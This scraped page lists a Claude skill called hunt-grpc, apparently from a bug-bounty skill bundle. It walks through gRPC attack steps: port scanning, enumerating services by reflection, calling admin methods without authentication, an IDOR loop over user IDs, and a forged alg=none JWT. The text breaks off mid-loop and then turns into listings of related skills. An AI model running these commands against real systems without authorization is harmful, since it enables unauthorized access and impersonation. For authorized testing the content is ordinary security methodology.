apk-redteam-pipeline
End-to-end Android APK red-team pipeline — automated APK acquisition (Play Store + apkpure + apkmirror fallback), jadx decompilation, secret/URL/JWT/Firebase…
Hunt gRPC vulnerabilities — server reflection enabled (enumerate all services/methods), missing authentication / metadata-stripping on internal endpoints, plaintext gRPC over HTTP/2, internal endpoint disclosure, proto file leakage, gRPC-Web/grpc-gateway transcoding injection,
$ npx -y skills add elementalsouls/Claude-BugHunter --skill hunt-grpc --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/hunt-grpcContext preview
The summary Claude sees to decide when to auto-load this skill.
Hunt gRPC vulnerabilities — server reflection enabled (enumerate all services/methods), missing authentication / metadata-stripping on internal endpoints, plaintext gRPC over HTTP/2, internal endpoint disclosure, proto file leakage, gRPC-Web/grpc-gateway transcoding injection,
name: hunt-grpc description: "Hunt gRPC vulnerabilities — server reflection enabled (enumerate all services/methods), missing authentication / metadata-stripping on internal endpoints, plaintext gRPC over HTTP/2, internal endpoint disclosure, proto file leakage, gRPC-Web/grpc-gateway transcoding injection, and HTTP/2 Rapid Reset DoS (CVE-2023-44487). Use when target exposes port 50051 / 443 / 8443 / 9090 with HTTP/2, when grpcurl/grpcui detects reflection, when an Envoy or grpc-gateway proxy is fronting a microservice, or when recon reveals a microservice architecture." sources: hackerone_public, grpc_security_research, cert_cc_advisory report_count: 6
gRPC reflection enabled = full service catalog enumeration without source code. The highest-value gRPC bugs come from the architectural assumption that a service is "internal" — auth is enforced at the edge proxy, and the backend trusts any caller that reaches it. Once you reach the backend directly (exposed port, SSRF, proxy bypass), that trust collapses.
**Highest-value findings:**
---
# Common gRPC ports (50051 native; 443/8443 via TLS+ALPN h2; 9090/8080 h2c) nmap -sV -p 50051,50052,443,9090,8080,8443,6565,9000 $TARGET 2>/dev/null | grep open # ALPN must negotiate h2 — gRPC cannot run on HTTP/1.1 echo | openssl s_client -alpn h2 -connect $TARGET:443 2>/dev/null | grep -i "ALPN.*h2" # Native-gRPC fingerprint: an HTTP/2 POST to a bogus method returns a grpc-status # trailer (12 = UNIMPLEMENTED) even when the path is wrong — strong signal it's gRPC. curl -s --http2-prior-knowledge -X POST "http://$TARGET:9090/x.Y/Z" \ -H "content-type: application/grpc" -o /dev/null -D - | grep -i grpc-status # TLS-fronted h2 (port 443): look for grpc-status trailer / grpc content-type curl -s --http2 -X POST "https://$TARGET/grpc.health.v1.Health/Check" \ -H "content-type: application/grpc-web+proto" -o /dev/null -D - | grep -i "grpc-status\|content-type"
`grpc-status` trailer present ⇒ a gRPC server (or grpc-gateway/Envoy) is behind that port. `UNIMPLEMENTED` on a random path is normal and only confirms the transport — not a finding.
---
brew install grpcurl # or: go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest # List services — -plaintext for h2c, -insecure for self-signed TLS, plain for valid TLS grpcurl -plaintext $TARGET:50051 list grpcurl -insecure $TARGET:443 list # Typical output when reflection is on: # grpc.reflection.v1.ServerReflection # grpc.health.v1.Health # user.UserService # admin.AdminService # payment.PaymentService # List + describe every method of each service grpcurl -plaintext $TARGET:50051 list admin.AdminService grpcurl -plaintext $TARGET:50051 describe admin.AdminService.DeleteUser grpcurl -plaintext $TARGET:50051 describe .admin.DeleteUserRequest # message schema # Dump the whole catalog to triage interesting surfaces for SVC in $(grpcurl -plaintext $TARGET:50051 list); do echo "== $SVC =="; grpcurl -plaintext $TARGET:50051 list "$SVC" done | tee grpc-catalog.txt grep -iE 'admin|internal|debug|secret|impersonate|exec|migrate|reset|delete' grpc-catalog.txt
**Reflection disabled?** You can still call known methods if you can guess them, or rebuild the descriptor set from a leaked `.proto` (Phase 5) and pass it with `grpcurl -protoset bundle.bin ...`. Reflection-off is a hardening control, not a security boundary.
---
# Baseline: call a sensitive method with NO auth metadata
grpcurl -plaintext $TARGET:50051 -d '{}' admin.AdminService/ListUsers
# IDOR across an enumerable id field
for ID in 1 2 3 100 1000 1001; do
echo "id=$ID"; grpcurl -plaintext $TARGET:50051 \
-d "{\"user_id\": $ID}" user.UserService/GetUser 2>&1 | head -4
done**Interpret the gRPC status code, not just whether bytes came back (see Validation):**
---
# (a) Forged bearer / alg=none JWT in the authorization metadata
grpcurl -plaintext $TARGET:50051 \
-H "authorization: Bearer eyJhbGciOiJub25lIn0.eyJyb2xlIjoiYWRtaW4iLCJzdWIiOiIxIn0." \
-d '{}' admin.AdminService/GetConfig
# (b) Backend-trusts-proxy headers: many gRPC backends authenticate at Envoy and
# then trust identity injected as metadata. If the edge does not STRIP these,
# spoofing them = full impersonation. Test every plausible name:
for H inA self-contained Claude skill bundle for bug hunting and external red-team work · 83 skills · 15 slash commands · 681 disclosed-report patterns (433 now individually cited & auditable) across 24 core vulnerability classes · enterprise identity +
Repo: elementalsouls/Claude-BugHunter
End-to-end Android APK red-team pipeline — automated APK acquisition (Play Store + apkpure + apkmirror fallback), jadx decompilation, secret/URL/JWT/Firebase…
Local-tooling companion to the bug-bounty orchestrator — carries the SAME complete bug-bounty workflow, but reach for THIS variant when you also need to…
Use at the START of any bug bounty hunting session, when switching targets, or when feeling lost about what to do next. Master orchestrator that combines the…
Complete bug bounty workflow — recon (subdomain enumeration, asset discovery, fingerprinting, HackerOne scope, source code audit), pre-hunt learning (disclosed…
Bugcrowd-specific reporting tactics complementing report-writing: VRT category search-and-fallback strategy when no exact match exists, manual severity…
Cloud IAM red-team attack chain across AWS, Azure, GCP — focused on EXTERNAL exploitation paths and post-credential-discovery privilege analysis. Covers IAM…